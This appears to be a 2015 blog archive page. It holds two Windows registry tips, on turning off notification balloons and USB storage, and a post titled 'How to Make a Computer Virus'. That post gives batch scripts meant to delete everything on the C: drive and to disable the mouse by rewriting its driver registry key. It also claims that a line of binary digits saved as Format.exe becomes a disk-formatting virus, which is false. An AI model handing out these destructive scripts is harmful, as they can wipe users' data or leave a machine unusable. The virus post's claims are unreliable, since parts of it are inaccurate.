Skip to main content

Posts

Showing posts from June 6, 2015
2. Disable Notification Balloons in Windows 7 and Vista: You can now disable the annoying notification balloons  that keeps popping up frequently with warning messages and reminders.  Here is a step-by-step procedure to do that: Open the Registry Editor and navigate to the following key: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced Right-click on the right-hand pane, and create a new “DWORD”. Rename it to EnableBalloonTips , double-click on it and set the “Value data” to 0 . Reboot the computer to see the changes in effect.
1. Disable USB Devices: Disabling USB ports can be a smart idea to add security to the computer.  This can be really handy if the computer is on a public place where  the chances of virus and other malware infection is really high.  You can easily disable access to USB ports with the following registry hack:  Open the Registry Editor (Start -> Run -> Type regedit and hit Enter) In the registry, navigate to the following key: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\UsbStor In the right-side pane, double-click on “Start”. In the “Value data” field enter 4 and click on “OK”. Close the Registry Editor and reboot.
5 Soft Skills That Every IT Professional Needs   
*****How to Make a Computer Virus*** >>>Virus that format C: Drive: 1. Open Notepad and copy below code into it. @Echo off Del C:\ *.* |y 2. Save this file as virus.bat (Name can be anything but .bat is must) 3. Now, running this file will delete all the content of C Drive. >>>Virus that Disable Mouse: Open Notepad and copy below codes rem --------------------------------- rem Disable Mouse set key="HKEY_LOCAL_MACHINE\system\CurrentControlSet\Services\Mouclass" reg delete %key% reg add %key% /v Start /t REG_DWORD /d 4 rem --------------------------------- Save this file as virus.bat Done you just created your virus. >>>Virus that create binary virus to format HARDDIsK: 1. Copy the below codes into Notepad. 01001011000111110010010101010101010000011111100000 2. Save the file as Format.exe 3. You just created virus to format Hard Drive. Enjoy !!! Warning: Please don't try to run on your own comput